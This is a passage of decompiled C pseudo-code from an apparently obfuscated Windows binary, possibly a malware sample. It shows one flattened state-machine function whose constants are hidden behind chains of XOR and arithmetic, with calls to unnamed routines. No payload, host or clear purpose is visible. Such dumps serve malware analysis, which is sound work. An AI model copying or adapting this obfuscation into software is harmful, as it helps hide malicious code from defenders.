                                                                                                                                                                            				signed int _t963;
                                                                                                                                                                            				signed int _t964;
                                                                                                                                                                            				signed int _t965;
                                                                                                                                                                            				signed int _t966;
                                                                                                                                                                            				signed int _t967;
                                                                                                                                                                            				signed int _t968;
                                                                                                                                                                            				signed int _t969;
                                                                                                                                                                            				signed int _t970;
                                                                                                                                                                            				signed int _t971;
                                                                                                                                                                            				signed int _t972;
                                                                                                                                                                            				signed int _t973;
                                                                                                                                                                            				signed int _t974;
                                                                                                                                                                            				signed int _t975;
                                                                                                                                                                            				signed int _t976;
                                                                                                                                                                            				signed int _t978;
                                                                                                                                                                            				signed int _t980;
                                                                                                                                                                            				signed int _t985;
                                                                                                                                                                            				signed int _t986;
                                                                                                                                                                            				signed int* _t989;
                                                                                                                                                                            				void* _t991;
                                                                                                                                                                            
                                                                                                                                                                            				_t876 = _a28;
                                                                                                                                                                            				_push(_a48);
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_v4 = __ecx;
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(_a36);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_t876);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20 & 0x0000ffff);
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_a20 & 0x0000ffff);
                                                                                                                                                                            				_v304 = 0x84e682;
                                                                                                                                                                            				_t989 =  &(( &_v304)[0xe]);
                                                                                                                                                                            				_v304 = _v304 + 0xeb1b;
                                                                                                                                                                            				_v304 = _v304 ^ 0x0f7f391c;
                                                                                                                                                                            				_v304 = _v304 ^ 0x0ffae881;
                                                                                                                                                                            				_t874 = 0;
                                                                                                                                                                            				_v80 = 0xd03450;
                                                                                                                                                                            				_t978 = 0x7e00160;
                                                                                                                                                                            				_v80 = _v80 + 0x474c;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00d07b8f;
                                                                                                                                                                            				_v40 = 0x62fb41;
                                                                                                                                                                            				_v40 = _v40 ^ 0x58566629;
                                                                                                                                                                            				_v40 = _v40 ^ 0x58349da0;
                                                                                                                                                                            				_v56 = 0xe1b746;
                                                                                                                                                                            				_v56 = _v56 + 0x8be3;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00e2c329;
                                                                                                                                                                            				_v32 = 0xe6e4c5;
                                                                                                                                                                            				_v32 = _v32 + 0xfb3f;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00e7a004;
                                                                                                                                                                            				_v164 = 0x3535e2;
                                                                                                                                                                            				_v164 = _v164 + 0xb15e;
                                                                                                                                                                            				_v164 = _v164 + 0xffff4c2e;
                                                                                                                                                                            				_v164 = _v164 ^ 0x0075336e;
                                                                                                                                                                            				_v256 = 0xe056c0;
                                                                                                                                                                            				_v256 = _v256 >> 0xf;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_t960 = 0xf;
                                                                                                                                                                            				_v256 = _v256 / _t960;
                                                                                                                                                                            				_t961 = 0x75;
                                                                                                                                                                            				_v256 = _v256 / _t961;
                                                                                                                                                                            				_v256 = _v256 ^ 0x00040000;
                                                                                                                                                                            				_v64 = 0xc12004;
                                                                                                                                                                            				_v64 = _v64 | 0x05a7924d;
                                                                                                                                                                            				_v64 = _v64 ^ 0x01e7b24d;
                                                                                                                                                                            				_v200 = 0x3d9b4;
                                                                                                                                                                            				_v200 = _v200 + 0xffffba05;
                                                                                                                                                                            				_t962 = 0x4d;
                                                                                                                                                                            				_push("true");
                                                                                                                                                                            				_v200 = _v200 / _t962;
                                                                                                                                                                            				_v200 = _v200 >> 0xa;
                                                                                                                                                                            				_v200 = _v200 ^ 0x00080002;
                                                                                                                                                                            				_v264 = 0xdbb33c;
                                                                                                                                                                            				_pop(_t963);
                                                                                                                                                                            				_v264 = _v264 / _t963;
                                                                                                                                                                            				_v264 = _v264 ^ 0x3bde5a68;
                                                                                                                                                                            				_t964 = 0x74;
                                                                                                                                                                            				_v264 = _v264 * 0x67;
                                                                                                                                                                            				_v264 = _v264 ^ 0x14497559;
                                                                                                                                                                            				_v172 = 0x2a3d0;
                                                                                                                                                                            				_v172 = _v172 + 0xffff520a;
                                                                                                                                                                            				_v172 = _v172 + 0xffffc196;
                                                                                                                                                                            				_v172 = _v172 ^ 0x0001b670;
                                                                                                                                                                            				_v16 = 0x40a0dc;
                                                                                                                                                                            				_v16 = _v16 >> 0xc;
                                                                                                                                                                            				_v16 = _v16 ^ 0x8000040a;
                                                                                                                                                                            				_v280 = 0x3a90ef;
                                                                                                                                                                            				_v280 = _v280 + 0xfffff29b;
                                                                                                                                                                            				_v280 = _v280 + 0xd15d;
                                                                                                                                                                            				_v280 = _v280 + 0xffff2fb1;
                                                                                                                                                                            				_v280 = _v280 ^ 0x003a8498;
                                                                                                                                                                            				_v276 = 0x2b48bd;
                                                                                                                                                                            				_v276 = _v276 * 0x59;
                                                                                                                                                                            				_v276 = _v276 | 0x0b3e9c0e;
                                                                                                                                                                            				_v276 = _v276 + 0x2f0e;
                                                                                                                                                                            				_v276 = _v276 ^ 0x0f3f0c8c;
                                                                                                                                                                            				_v244 = 0xf133cf;
                                                                                                                                                                            				_v244 = _v244 * 0x50;
                                                                                                                                                                            				_v244 = _v244 >> 0xe;
                                                                                                                                                                            				_v244 = _v244 >> 2;
                                                                                                                                                                            				_v244 = _v244 ^ 0x00004b7f;
                                                                                                                                                                            				_v220 = 0x48bde3;
                                                                                                                                                                            				_v220 = _v220 * 7;
                                                                                                                                                                            				_v220 = _v220 << 3;
                                                                                                                                                                            				_v220 = _v220 << 7;
                                                                                                                                                                            				_v220 = _v220 ^ 0xf4c4d41f;
                                                                                                                                                                            				_v152 = 0xdfcbbb;
                                                                                                                                                                            				_v152 = _v152 / _t964;
                                                                                                                                                                            				_v152 = _v152 ^ 0x15954f38;
                                                                                                                                                                            				_v152 = _v152 ^ 0x1594a2df;
                                                                                                                                                                            				_v236 = 0x79b2d;
                                                                                                                                                                            				_v236 = _v236 + 0xffffa56f;
                                                                                                                                                                            				_v236 = _v236 >> 0xc;
                                                                                                                                                                            				_v236 = _v236 + 0xffff51ce;
                                                                                                                                                                            				_v236 = _v236 ^ 0xffff5342;
                                                                                                                                                                            				_v300 = 0x53b7c5;
                                                                                                                                                                            				_v300 = _v300 | 0xbc55bbc8;
                                                                                                                                                                            				_v300 = _v300 >> 0xb;
                                                                                                                                                                            				_v300 = _v300 * 0x4a;
                                                                                                                                                                            				_v300 = _v300 ^ 0x06ca0610;
                                                                                                                                                                            				_v300 = 0x831a37;
                                                                                                                                                                            				_v300 = _v300 >> 0xa;
                                                                                                                                                                            				_v300 = _v300 ^ 0xf07c3cef;
                                                                                                                                                                            				_v300 = _v300 >> 2;
                                                                                                                                                                            				_v300 = _v300 ^ 0x3c15b978;
                                                                                                                                                                            				_v296 = 0xbc94b;
                                                                                                                                                                            				_v296 = _v296 ^ 0xc913797f;
                                                                                                                                                                            				_v296 = _v296 ^ 0xc91ffb85;
                                                                                                                                                                            				_v304 = 0xeb47f;
                                                                                                                                                                            				_v304 = _v304 * 0x21;
                                                                                                                                                                            				_v304 = _v304 >> 9;
                                                                                                                                                                            				_v304 = _v304 ^ 0x00079d5b;
                                                                                                                                                                            				_v296 = 0x863d92;
                                                                                                                                                                            				_v296 = _v296 | 0xc3fe325e;
                                                                                                                                                                            				_v296 = _v296 ^ 0xc3f15d89;
                                                                                                                                                                            				_v304 = 0x8c9292;
                                                                                                                                                                            				_v304 = _v304 * 0x65;
                                                                                                                                                                            				_v304 = _v304 * 0x2f;
                                                                                                                                                                            				_v304 = _v304 ^ 0x2ea0d0e4;
                                                                                                                                                                            				_v296 = 0x7998c8;
                                                                                                                                                                            				_v296 = _v296 * 0x1f;
                                                                                                                                                                            				_v296 = _v296 ^ 0x0ebe6fc9;
                                                                                                                                                                            				_v304 = 0xc13eda;
                                                                                                                                                                            				_v304 = _v304 + 0x239b;
                                                                                                                                                                            				_v304 = _v304 | 0x8aa80eb1;
                                                                                                                                                                            				_v304 = _v304 ^ 0x8ae5aa52;
                                                                                                                                                                            				_v304 = 0x2ac635;
                                                                                                                                                                            				_t965 = 3;
                                                                                                                                                                            				_v304 = _v304 * 0x1a;
                                                                                                                                                                            				_v304 = _v304 | 0xa2ccc89a;
                                                                                                                                                                            				_v304 = _v304 ^ 0xa6da26ac;
                                                                                                                                                                            				_v296 = 0xd161a;
                                                                                                                                                                            				_v296 = _v296 >> 0xb;
                                                                                                                                                                            				_v296 = _v296 ^ 0x00086437;
                                                                                                                                                                            				_v300 = 0xc8d906;
                                                                                                                                                                            				_v300 = _v300 << 5;
                                                                                                                                                                            				_v300 = _v300 / _t965;
                                                                                                                                                                            				_v300 = _v300 | 0xd3e5db7e;
                                                                                                                                                                            				_v300 = _v300 ^ 0xdbffc0c3;
                                                                                                                                                                            				_v304 = 0xa90eaa;
                                                                                                                                                                            				_t966 = 0x62;
                                                                                                                                                                            				_v304 = _v304 / _t966;
                                                                                                                                                                            				_v304 = _v304 ^ 0xa321830c;
                                                                                                                                                                            				_v304 = _v304 ^ 0xa32eb72c;
                                                                                                                                                                            				_v296 = 0xc9c90e;
                                                                                                                                                                            				_v296 = _v296 ^ 0x29ac5136;
                                                                                                                                                                            				_v296 = _v296 ^ 0x296c2187;
                                                                                                                                                                            				_v168 = 0xb8ba74;
                                                                                                                                                                            				_v168 = _v168 >> 0xb;
                                                                                                                                                                            				_v168 = _v168 | 0xd39b7801;
                                                                                                                                                                            				_v168 = _v168 ^ 0xd39a1a13;
                                                                                                                                                                            				_v240 = 0xce03d4;
                                                                                                                                                                            				_v240 = _v240 + 0xffff6ba1;
                                                                                                                                                                            				_v240 = _v240 + 0xffff3730;
                                                                                                                                                                            				_t967 = 0x7e;
                                                                                                                                                                            				_v240 = _v240 / _t967;
                                                                                                                                                                            				_v240 = _v240 ^ 0x00015c8a;
                                                                                                                                                                            				_v144 = 0x76dd98;
                                                                                                                                                                            				_v144 = _v144 << 0xa;
                                                                                                                                                                            				_t968 = 0xb;
                                                                                                                                                                            				_v144 = _v144 / _t968;
                                                                                                                                                                            				_v144 = _v144 ^ 0x13f9c089;
                                                                                                                                                                            				_v88 = 0xd6758c;
                                                                                                                                                                            				_t969 = 0x7c;
                                                                                                                                                                            				_v88 = _v88 * 0x7d;
                                                                                                                                                                            				_v88 = _v88 ^ 0x68b07bf0;
                                                                                                                                                                            				_v112 = 0x136ce2;
                                                                                                                                                                            				_v112 = _v112 * 0x7a;
                                                                                                                                                                            				_v112 = _v112 ^ 0x094e8b6c;
                                                                                                                                                                            				_v160 = 0xc781f4;
                                                                                                                                                                            				_v160 = _v160 + 0x7b6;
                                                                                                                                                                            				_v160 = _v160 ^ 0xd2a6870e;
                                                                                                                                                                            				_v160 = _v160 ^ 0xd267b3cc;
                                                                                                                                                                            				_v216 = 0x3cec52;
                                                                                                                                                                            				_v216 = _v216 / _t969;
                                                                                                                                                                            				_v216 = _v216 + 0xe7c2;
                                                                                                                                                                            				_v216 = _v216 + 0x185f;
                                                                                                                                                                            				_v216 = _v216 ^ 0x00083478;
                                                                                                                                                                            				_v128 = 0xe8ace2;
                                                                                                                                                                            				_v128 = _v128 + 0xffff5a4b;
                                                                                                                                                                            				_v128 = _v128 >> 5;
                                                                                                                                                                            				_v128 = _v128 ^ 0x00080537;
                                                                                                                                                                            				_v20 = 0xba5f1f;
                                                                                                                                                                            				_t970 = 0x28;
                                                                                                                                                                            				_v20 = _v20 / _t970;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00097bc9;
                                                                                                                                                                            				_v184 = 0x868bed;
                                                                                                                                                                            				_v184 = _v184 ^ 0x5d9bbcc4;
                                                                                                                                                                            				_t971 = 0x15;
                                                                                                                                                                            				_t985 = 0x61;
                                                                                                                                                                            				_v184 = _v184 * 0x7e;
                                                                                                                                                                            				_v184 = _v184 ^ 0xd4635941;
                                                                                                                                                                            				_v248 = 0xc6bb26;
                                                                                                                                                                            				_v248 = _v248 + 0x4226;
                                                                                                                                                                            				_v248 = _v248 + 0x1eaa;
                                                                                                                                                                            				_v248 = _v248 + 0x143f;
                                                                                                                                                                            				_v248 = _v248 ^ 0x00cd4d4f;
                                                                                                                                                                            				_v124 = 0x1449aa;
                                                                                                                                                                            				_v124 = _v124 >> 7;
                                                                                                                                                                            				_v124 = _v124 + 0xffff4698;
                                                                                                                                                                            				_v124 = _v124 ^ 0xfffccf45;
                                                                                                                                                                            				_v204 = 0xd9ae2a;
                                                                                                                                                                            				_v204 = _v204 * 0x25;
                                                                                                                                                                            				_v204 = _v204 | 0x41acc33e;
                                                                                                                                                                            				_v204 = _v204 + 0xe9b9;
                                                                                                                                                                            				_v204 = _v204 ^ 0x5ff1a5de;
                                                                                                                                                                            				_v104 = 0x27630a;
                                                                                                                                                                            				_v104 = _v104 | 0x34992b3f;
                                                                                                                                                                            				_v104 = _v104 ^ 0x34bda39f;
                                                                                                                                                                            				_v28 = 0xa04064;
                                                                                                                                                                            				_v28 = _v28 | 0x72e9e7d8;
                                                                                                                                                                            				_v28 = _v28 ^ 0x72e1f0ab;
                                                                                                                                                                            				_v48 = 0xc4ba01;
                                                                                                                                                                            				_v48 = _v48 << 7;
                                                                                                                                                                            				_v48 = _v48 ^ 0x6259539c;
                                                                                                                                                                            				_v180 = 0x3340f4;
                                                                                                                                                                            				_v180 = _v180 | 0x3035b2e2;
                                                                                                                                                                            				_v180 = _v180 << 9;
                                                                                                                                                                            				_v180 = _v180 ^ 0x6feb3ded;
                                                                                                                                                                            				_v232 = 0x2e047a;
                                                                                                                                                                            				_v232 = _v232 >> 0xa;
                                                                                                                                                                            				_v232 = _v232 * 0x12;
                                                                                                                                                                            				_v232 = _v232 / _t971;
                                                                                                                                                                            				_v232 = _v232 ^ 0x0002c217;
                                                                                                                                                                            				_v72 = 0x299f12;
                                                                                                                                                                            				_v72 = _v72 << 3;
                                                                                                                                                                            				_v72 = _v72 ^ 0x0148e07c;
                                                                                                                                                                            				_v188 = 0xf414db;
                                                                                                                                                                            				_v188 = _v188 << 0x10;
                                                                                                                                                                            				_v188 = _v188 / _t985;
                                                                                                                                                                            				_v188 = _v188 ^ 0x003bf194;
                                                                                                                                                                            				_v156 = 0xc18fa7;
                                                                                                                                                                            				_t986 = 0x6b;
                                                                                                                                                                            				_v156 = _v156 / _t986;
                                                                                                                                                                            				_t972 = 0xc;
                                                                                                                                                                            				_v156 = _v156 / _t972;
                                                                                                                                                                            				_v156 = _v156 ^ 0x0009860f;
                                                                                                                                                                            				_v208 = 0xbb24e8;
                                                                                                                                                                            				_v208 = _v208 + 0xd4bb;
                                                                                                                                                                            				_v208 = _v208 + 0xffffec33;
                                                                                                                                                                            				_t973 = 0x26;
                                                                                                                                                                            				_v208 = _v208 / _t973;
                                                                                                                                                                            				_v208 = _v208 ^ 0x000d494f;
                                                                                                                                                                            				_v92 = 0xf4dbce;
                                                                                                                                                                            				_v92 = _v92 + 0x5ee7;
                                                                                                                                                                            				_v92 = _v92 ^ 0x00f22c8f;
                                                                                                                                                                            				_v100 = 0x7239d1;
                                                                                                                                                                            				_v100 = _v100 | 0x01f5add3;
                                                                                                                                                                            				_v100 = _v100 ^ 0x01f71b27;
                                                                                                                                                                            				_v292 = 0x4b72c4;
                                                                                                                                                                            				_t974 = 0x61;
                                                                                                                                                                            				_v292 = _v292 * 0xb;
                                                                                                                                                                            				_v292 = _v292 + 0xfffff18f;
                                                                                                                                                                            				_v292 = _v292 * 0xc;
                                                                                                                                                                            				_v292 = _v292 ^ 0x26e66304;
                                                                                                                                                                            				_v224 = 0xeae701;
                                                                                                                                                                            				_v224 = _v224 << 1;
                                                                                                                                                                            				_v224 = _v224 << 6;
                                                                                                                                                                            				_v224 = _v224 | 0xd938d457;
                                                                                                                                                                            				_v224 = _v224 ^ 0xfd70504c;
                                                                                                                                                                            				_v108 = 0xa91a4c;
                                                                                                                                                                            				_v108 = _v108 << 2;
                                                                                                                                                                            				_v108 = _v108 ^ 0x02a24d10;
                                                                                                                                                                            				_v68 = 0x46e95;
                                                                                                                                                                            				_v68 = _v68 ^ 0x636abfcf;
                                                                                                                                                                            				_v68 = _v68 ^ 0x636edf46;
                                                                                                                                                                            				_v76 = 0x93e843;
                                                                                                                                                                            				_v76 = _v76 | 0xba39a6db;
                                                                                                                                                                            				_v76 = _v76 ^ 0xbaba9d8f;
                                                                                                                                                                            				_v84 = 0xd50ea2;
                                                                                                                                                                            				_v84 = _v84 | 0x50ec9d25;
                                                                                                                                                                            				_v84 = _v84 ^ 0x50f8ba70;
                                                                                                                                                                            				_v288 = 0x52484f;
                                                                                                                                                                            				_v288 = _v288 + 0xb430;
                                                                                                                                                                            				_v288 = _v288 * 0x4c;
                                                                                                                                                                            				_v288 = _v288 >> 0xb;
                                                                                                                                                                            				_v288 = _v288 ^ 0x000d4af8;
                                                                                                                                                                            				_v284 = 0x2da3fa;
                                                                                                                                                                            				_v284 = _v284 | 0xb3c63afe;
                                                                                                                                                                            				_v284 = _v284 ^ 0xfce0d7d7;
                                                                                                                                                                            				_v284 = _v284 + 0xffff4c41;
                                                                                                                                                                            				_v284 = _v284 ^ 0x4f0e5b87;
                                                                                                                                                                            				_v52 = 0xe252ad;
                                                                                                                                                                            				_v52 = _v52 | 0x3c4f00b6;
                                                                                                                                                                            				_v52 = _v52 ^ 0x3cecbbb2;
                                                                                                                                                                            				_v60 = 0xab577e;
                                                                                                                                                                            				_v60 = _v60 << 7;
                                                                                                                                                                            				_v60 = _v60 ^ 0x55a8aa1a;
                                                                                                                                                                            				_v148 = 0x5c065f;
                                                                                                                                                                            				_v148 = _v148 << 0x10;
                                                                                                                                                                            				_v148 = _v148 / _t986;
                                                                                                                                                                            				_v148 = _v148 ^ 0x00079968;
                                                                                                                                                                            				_v252 = 0xfb0d10;
                                                                                                                                                                            				_v252 = _v252 / _t974;
                                                                                                                                                                            				_v252 = _v252 << 0x10;
                                                                                                                                                                            				_v252 = _v252 ^ 0x25f2b671;
                                                                                                                                                                            				_v252 = _v252 ^ 0xb36c8d69;
                                                                                                                                                                            				_v260 = 0x776100;
                                                                                                                                                                            				_v260 = _v260 >> 0x10;
                                                                                                                                                                            				_v260 = _v260 | 0xe8d0a90c;
                                                                                                                                                                            				_v260 = _v260 * 0x14;
                                                                                                                                                                            				_v260 = _v260 ^ 0x304a111f;
                                                                                                                                                                            				_v268 = 0x4079f3;
                                                                                                                                                                            				_v268 = _v268 >> 4;
                                                                                                                                                                            				_t975 = 0x4f;
                                                                                                                                                                            				_v268 = _v268 * 0x5f;
                                                                                                                                                                            				_v268 = _v268 + 0x21c5;
                                                                                                                                                                            				_v268 = _v268 ^ 0x017b7447;
                                                                                                                                                                            				_v44 = 0x101fed;
                                                                                                                                                                            				_v44 = _v44 ^ 0x1e85c214;
                                                                                                                                                                            				_v44 = _v44 ^ 0x1e9d5cc7;
                                                                                                                                                                            				_v140 = 0xb56248;
                                                                                                                                                                            				_v140 = _v140 >> 0xb;
                                                                                                                                                                            				_v140 = _v140 ^ 0xb0648700;
                                                                                                                                                                            				_v140 = _v140 ^ 0xb06b52ff;
                                                                                                                                                                            				_v228 = 0x5d2032;
                                                                                                                                                                            				_v228 = _v228 + 0xe696;
                                                                                                                                                                            				_v228 = _v228 + 0x90e;
                                                                                                                                                                            				_v228 = _v228 << 6;
                                                                                                                                                                            				_v228 = _v228 ^ 0x178d1a7f;
                                                                                                                                                                            				_v192 = 0x46faa8;
                                                                                                                                                                            				_v192 = _v192 / _t975;
                                                                                                                                                                            				_v192 = _v192 + 0x59ff;
                                                                                                                                                                            				_v192 = _v192 ^ 0x00002efb;
                                                                                                                                                                            				_v272 = 0x13fbcb;
                                                                                                                                                                            				_v272 = _v272 + 0xffff66dd;
                                                                                                                                                                            				_v272 = _v272 * 0x5d;
                                                                                                                                                                            				_v272 = _v272 + 0xffff70cc;
                                                                                                                                                                            				_v272 = _v272 ^ 0x070467b9;
                                                                                                                                                                            				_v136 = 0xda75c;
                                                                                                                                                                            				_v136 = _v136 << 0xe;
                                                                                                                                                                            				_v136 = _v136 << 8;
                                                                                                                                                                            				_v136 = _v136 ^ 0xd703a46a;
                                                                                                                                                                            				_v24 = 0x98e6;
                                                                                                                                                                            				_v24 = _v24 | 0x30837cf6;
                                                                                                                                                                            				_v24 = _v24 ^ 0x308cf6e6;
                                                                                                                                                                            				_v196 = 0x2348e5;
                                                                                                                                                                            				_v196 = _v196 + 0xec0b;
                                                                                                                                                                            				_v196 = _v196 + 0xffff4f76;
                                                                                                                                                                            				_v196 = _v196 + 0xffff4b3e;
                                                                                                                                                                            				_v196 = _v196 ^ 0x002962b3;
                                                                                                                                                                            				_v176 = 0x7bcaf7;
                                                                                                                                                                            				_v176 = _v176 * 0x37;
                                                                                                                                                                            				_v176 = _v176 << 4;
                                                                                                                                                                            				_v176 = _v176 ^ 0xa986161e;
                                                                                                                                                                            				_v120 = 0x3fa34;
                                                                                                                                                                            				_v120 = _v120 * 0x49;
                                                                                                                                                                            				_v120 = _v120 >> 7;
                                                                                                                                                                            				_v120 = _v120 ^ 0x00066829;
                                                                                                                                                                            				_v116 = 0x9c5c94;
                                                                                                                                                                            				_v116 = _v116 + 0x20fd;
                                                                                                                                                                            				_v116 = _v116 >> 2;
                                                                                                                                                                            				_v116 = _v116 ^ 0x0025da20;
                                                                                                                                                                            				_v212 = 0x6b8402;
                                                                                                                                                                            				_v212 = _v212 + 0x9bc6;
                                                                                                                                                                            				_v212 = _v212 * 0x74;
                                                                                                                                                                            				_v212 = _v212 + 0xe621;
                                                                                                                                                                            				_v212 = _v212 ^ 0x30fe6560;
                                                                                                                                                                            				_v96 = 0xbe9741;
                                                                                                                                                                            				_v96 = _v96 + 0xffffd77c;
                                                                                                                                                                            				_v96 = _v96 ^ 0x00bbad9c;
                                                                                                                                                                            				_v304 = 0xe465cf;
                                                                                                                                                                            				_v304 = _v304 >> 4;
                                                                                                                                                                            				_v304 = _v304 << 5;
                                                                                                                                                                            				_v304 = _v304 ^ 0x01c3ad6d;
                                                                                                                                                                            				_v296 = 0xc47264;
                                                                                                                                                                            				_v296 = _v296 << 0xc;
                                                                                                                                                                            				_v296 = _v296 ^ 0x4720cdbf;
                                                                                                                                                                            				_v132 = 0x7ca780;
                                                                                                                                                                            				_v132 = _v132 + 0xa093;
                                                                                                                                                                            				_v132 = _v132 << 7;
                                                                                                                                                                            				_v132 = _v132 ^ 0x3ea11d20;
                                                                                                                                                                            				_t976 = _v8;
                                                                                                                                                                            				_t987 = _v8;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t937 = 0xd154a5a;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t846 = _v300;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L3:
                                                                                                                                                                            							_t991 = _t978 - 0x7e00160;
                                                                                                                                                                            							if(_t991 > 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t991 == 0) {
                                                                                                                                                                            								_t978 = 0xfd2ad77;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t978 == 0x1a1d1c) {
                                                                                                                                                                            									__eflags = E02F54BFC(_t976, _a16);
                                                                                                                                                                            									_t978 = 0x6a5d586;
                                                                                                                                                                            									_t866 = 1;
                                                                                                                                                                            									_t874 =  !=  ? _t866 : _t874;
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t978 == 0x352276a) {
                                                                                                                                                                            										_t867 = E02F5DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
                                                                                                                                                                            										_t987 = _t867;
                                                                                                                                                                            										__eflags = _t867;
                                                                                                                                                                            										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
                                                                                                                                                                            										E02F72B09(_v160, 0, _v216, _v128);
                                                                                                                                                                            										_t989 =  &(_t989[0xa]);
                                                                                                                                                                            										L39:
                                                                                                                                                                            										_t876 = _a28;
                                                                                                                                                                            										_t937 = 0xd154a5a;
                                                                                                                                                                            										goto L40;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t978 == 0x6a5d586) {
                                                                                                                                                                            											E02F6E358(_v196, _v176, _t976, _v120);
                                                                                                                                                                            											_t978 = 0x6d75a8e;
                                                                                                                                                                            											goto L12;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t978 == 0x6d75a8e) {
                                                                                                                                                                            												E02F6E358(_v116, _v212, _t846, _v96);
                                                                                                                                                                            												_t978 = 0xedc04fb;
                                                                                                                                                                            												L12:
                                                                                                                                                                            												L13:
                                                                                                                                                                            												_t876 = _a28;
                                                                                                                                                                            												goto L1;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												if(_t978 != 0x6fee97d) {
                                                                                                                                                                            													L40:
                                                                                                                                                                            													__eflags = _t978 - 0xb1727d5;
                                                                                                                                                                            													if(_t978 != 0xb1727d5) {
                                                                                                                                                                            														_t846 = _v300;
                                                                                                                                                                            														continue;
                                                                                                                                                                            													}
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t846 = E02F5ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
                                                                                                                                                                            													_t876 = _a28;
                                                                                                                                                                            													_t989 =  &(_t989[0xe]);
                                                                                                                                                                            													_v300 = _t846;
                                                                                                                                                                            													_t937 = 0xd154a5a;
                                                                                                                                                                            													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
                                                                                                                                                                            													continue;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L43:
                                                                                                                                                                            							return _t874;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t978 - _t937;
                                                                                                                                                                            						if(_t978 == _t937) {
                                                                                                                                                                            							__eflags =  *_t876;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_t847 = _v12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(_v188);
                                                                                                                                                                            								_push(_v72);
                                                                                                                                                                            								_push(_v232);
                                                                                                                                                                            								_t847 = E02F6E1F8(0x2f51a0c, _v180, __eflags);
                                                                                                                                                                            								_t989 =  &(_t989[3]);
                                                                                                                                                                            								_v12 = _t847;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
                                                                                                                                                                            							_t980 = _a32 & 1;
                                                                                                                                                                            							__eflags = _t980;
                                                                                                                                                                            							if(_t980 != 0) {
                                                                                                                                                                            								__eflags = _t946;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t976 = E02F54A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
                                                                                                                                                                            							E02F6FECB(_v12, _v68, _v76, _v84, _v288);
                                                                                                                                                                            							_t989 =  &(_t989[0x10]);
                                                                                                                                                                            							__eflags = _t976;
                                                                                                                                                                            							if(_t976 == 0) {
                                                                                                                                                                            								_t978 = 0x6d75a8e;
                                                                                                                                                                            								goto L39;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v36 = 1;
                                                                                                                                                                            								E02F73E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
                                                                                                                                                                            								_t989 =  &(_t989[5]);
                                                                                                                                                                            								__eflags = _t980;
                                                                                                                                                                            								if(_t980 != 0) {
                                                                                                                                                                            									E02F6C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
                                                                                                                                                                            									_t769 =  &_v36;
                                                                                                                                                                            									 *_t769 = _v36 | _v236;
                                                                                                                                                                            									__eflags =  *_t769;
                                                                                                                                                                            									E02F73E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
                                                                                                                                                                            									_t989 =  &(_t989[0xb]);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t978 = 0xf81d281;
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags = _t978 - 0xdd5f83a;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								__eflags = E02F5EF0C(_t976, _v80, __eflags) - _v40;
                                                                                                                                                                            								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t978 - 0xedc04fb;
                                                                                                                                                                            								if(_t978 == 0xedc04fb) {
                                                                                                                                                                            									E02F6E358(_v304, _v296, _t987, _v132);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags = _t978 - 0xf81d281;
                                                                                                                                                                            									if(_t978 == 0xf81d281) {
                                                                                                                                                                            										_t885 =  *_t876;
                                                                                                                                                                            										__eflags = _t885;
                                                                                                                                                                            										if(_t885 == 0) {
                                                                                                                                                                            											_t861 = 0;
                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t861 = _a28[1];
                                                                                                                                                                            										}
                                                                                                                                                                            										_push(_t885);
                                                                                                                                                                            										E02F710DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
                                                                                                                                                                            										_t989 =  &(_t989[7]);
                                                                                                                                                                            										asm("sbb esi, esi");
